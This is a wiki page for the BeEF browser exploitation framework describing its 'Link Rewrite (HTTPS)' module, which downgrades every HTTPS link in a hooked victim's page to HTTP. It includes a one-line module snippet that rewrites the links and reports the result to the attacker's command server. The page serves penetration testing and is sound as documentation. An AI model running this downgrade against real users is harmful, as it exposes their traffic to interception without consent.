-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Link Rewrite (HTTPS)
Haoxi Tan edited this page Jan 8, 2020
·
2 revisions
-
Objective: Replace all HTTPS links to HTTP
-
Authors: bcoles
-
Browsers: All
replace the protocol portion of all links from HTTPS to HTTP.
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinksProtocol(old_protocol, new_protocol, selector)+' '+old_protocol+' links rewritten to '+new_protocol);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK